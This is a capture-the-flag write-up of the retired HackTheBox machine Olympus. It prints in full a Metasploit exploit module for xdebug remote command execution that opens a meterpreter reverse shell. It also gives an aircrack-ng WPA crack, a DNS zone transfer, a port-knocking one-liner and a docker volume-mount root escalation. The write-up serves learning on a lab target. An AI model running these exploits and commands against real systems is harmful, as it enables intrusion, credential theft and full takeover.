HackTheBox Writeup — Olympus

Olympus

Hello Guys , I am Faisal Husaini and this is my writeup on Medium for Olympus machine which has retired and also this was my favorite box on HTB. My username on HTB is “faisalelino” .

This writeup is on Olympus box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.

The IP for this machine is 10.10.10.83, so let’s get started

NMAP Results

# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp filtered mit-ml-dev
144/tcp filtered news
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,”\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,”SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n”);

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018–1 IP address (1 host up) scanned in 78.87 seconds

We see port 22 for ssh is filtered , also port 80 is open , so lets open the IP in browser

HTTP Service

Nothing interesting here………. Let’s look at the source code too

Source Code of http://10.10.10.83

We see here nothing much important in the http , neither we got something from its source code , so its time for dirb scan

Dirb

Dirb Results

We dont get anything much of use from dirb , so its time to run nikto on http://10.10.10.83/

Nikto

Nikto Results

Nikto says uncommon header ‘xdebug’ found , so now lets google about it

XDebug

About XDebug
XDebug

As this was given about xdebug on its official website , so lets find for its exploit if any

MSF Exploit for XDebug on Exploit-DB by MinatoTW

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘xdebug Unauthenticated OS Command Execution’,
‘Description’ => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
‘DisclosureDate’ => ‘Sep 17 2017’,
‘Author’ => [
‘Ricter Zheng’, #Discovery https://twitter.com/RicterZ
‘Taki Tachibana’, # MinatoTW
‘Mumbai’ # Austin Hudson
],
‘References’ => [
[‘URL’, ‘https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
[‘URL’, ‘https://paper.seebug.org/397/']
],
‘License’ => MSF_LICENSE,
‘Platform’ => ‘php’,
‘Arch’ => [ARCH_PHP],
‘DefaultTarget’ => 0,
‘Stance’ => Msf::Exploit::Stance::Aggressive,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘php/meterpreter/reverse_tcp’
},
‘Payload’ => {
‘DisableNops’ => true,
},
‘Targets’ => [[ ‘Automatic’, {} ]],
))

register_options([
OptString.new(‘PATH’, [ true, “Path to target webapp”, “/index.php”]),
OptAddress.new(‘SRVHOST’, [ true, “Callback host for accepting connections”, “0.0.0.0”]),
OptInt.new(‘SRVPORT’, [true, “Port to listen for the debugger”, 9000]),
Opt::RPORT(80),
OptString.new(‘WriteableDir’, [ true, “A writeable directory on the target”, “/tmp”])
])
end

def check
begin
res = send_request_cgi({
‘uri’ => datastore[“PATH”],
‘method’ => ‘GET’,
‘vars_get’ => {
‘XDEBUG_SESSION_START’ => rand_text_alphanumeric(10)
}
})
vprint_status “Request sent\n#{res.headers}”
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good(“Looks like remote server has xdebug enabled\n”)
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end

def exploit
payl = Rex::Text.encode_base64(“#{payload.encoded}”)
file = “#{datastore[‘WriteableDir’]}”+”/”+rand_text_alphanumeric(5)
cmd1 = “eval -i 1 — “ + Rex::Text.encode_base64(“file_put_contents(\”#{file}\”,base64_decode(\”#{payl}\”)) && system(\” php #{file} \”)”) + “\x00”
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
‘LocalPort’ => datastore[‘SRVPORT’],
‘LocalHost’ => datastore[‘SRVHOST’],
‘Context’ => {
‘Msf’ => framework,
‘MsfExploit’ => self
})

client = server.accept
print_status(“Waiting for client response.”)
data = client.recv(1024)
print_status(“Receiving response”)
vprint_line(data)
print_status(“Shell might take upto a minute to respond.Please be patient.”)
print_status(“Sending payload of size #{cmd1.length} bytes”)
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
‘uri’ => datastore[‘PATH’],
‘method’ => ‘GET’,
‘headers’ => {
‘X-Forwarded-For’ => “#{lhost}”,
‘Cookie’ => ‘XDEBUG_SESSION=’+rand_text_alphanumeric(10)
}
})
end
end

Exploting XDebug using MSFConsole

We have to set RHOST which is 10.10.10.83 and LHOST to our tun0 IP address and then run the exploit command

Meterpreter

Bingo.!! We got meterpreter , now lets move on and see the contents

Diging into Meterpreter

Nothing much here , lets see the contents of Zeus user

We see something much like git folders , airgeddon.sh , a folder name captured etc..

Let’s see the contents of airgeddon.sh , we see that its very length bash script code , so nothing interesting there , now let’s dive to captured folder

We got a .cap file , we download it using our meterpreter shell.

Now lets crack this captured.cap file using aircrack

Cracking CAP file using Aircrack-ng

We crack the captured.cap file using the tool aircrack-ng

Command Used : aircrack-ng captured.cap -w rockyou.txt , and then we wait for the cracking to get finished

aircrack-ng

We got the key , which is “flightoficarus”

This was bit tricky to understand , then I came to know the word Icarus seems to be like greek which this box is based on , and that also from
nmap results we saw that ssh is open on port 2222 , so Icarus maybe the username , but what about password?

After asking a hint from my friend , he told me to see the captured.cap file , so i thought that the word “captured” maybe the password , but no..!!

Then Iopened the captured.cap file using Wireshark

Opening captured.cap file using Wireshark

We see something as a sentence , that maybe the password , so the sentence was like “Too_cl0se_to_th3_Sun” , now we copy this and connect to ssh

Connecting to SSH on Port 2222

ssh icarus@10.10.10.83 -p2222

ssh connection successful

Bingo we got in to ssh , lets see whats inside the home folder by “ls” command

We see a txt file name help_of_the_gods.txt and inside it we got a dns , so i will copy it to my /etc/hosts file with the IP of 10.10.10.83

DIG

So after talking a help from my friend , he told me to use dig

So Iused dig with “dig axfr ctfolympus.htb @10.10.10.83” , we get

Zone Transfers

In the txt area we see “St34l_th3_F1re!” which was similar to the password style for Icarus we got from captured.cap

But what about username , we see that “prometheus” from the same txt area , but when we tried it on port 2222 of ssh , it failed to connect

Also port 22 was filtered , then I didnt knew about port knocking , which my friend gave me help by saying to watch Ippsec’s Nineveh video

So from that Ilearn about port knocking and now we got to that part

Port Knocking

After watching the nineveh video from Ippsec , I saw that he used 3 ports from iptables or something , which I didn’t had in this box

So what to do????

Remember the txt area we got from dig , I said portal to Hades and then was 3 numbers

portal

These are the 3 ports to be used for port knocking , i.e, 3456 , 8234, 62431

So I used this command for knocking and also directly connect to ssh on port 22

for i in 3456 8234 62431; do nmap -Pn -p $i — host-timeout 201 — max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83

Port Knocking SSH

Now it connects to ssh without saying the port being filtered , now we enter the password which was “St34l_th3_F1re!”

Connection Successful

And we get in , now lets get the user flag

User Flag

User Flag

Bingo , now time for root

Privelege Escalation

We were not able to run sudo command as prometheus , so after the script execution complete , we saw only 1 thing interesting

LinEnum.sh

The user was hosting docker , which maybe a hint to docker privilege escalation , so after searching on google for docker privilege escalation , I got

docker run [tab tab] to see the images
docker run -t -i olympia /bin/bash
docker run -v /root:/root -i -t olympia /bin/bash

So Iran the last command and then got the root flag

Docker Priv Esc

We got root , now its time to get root flag which is located in /root/root.txt

Remember the 3 commands for docker which Igave above , use the 3rd one to get the flag

Root Flag

Root Flag

This machine was really very awesome and I gained alot of knowledge from it like Port Knocking , Docker Priv Esc etc.

Vulnerabilities Used To Solve This Box:-

  1. Zone Transfers
  2. Port Knocking
  3. Docker Privelege Escalation

References

Ippsec’s Nineveh Video for Port Knocking → https://www.youtube.com/watch?v=K9DKULxSBK4

Docker Privelege Escalation → https://fosterelli.co/privilege-escalation-via-docker.html

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover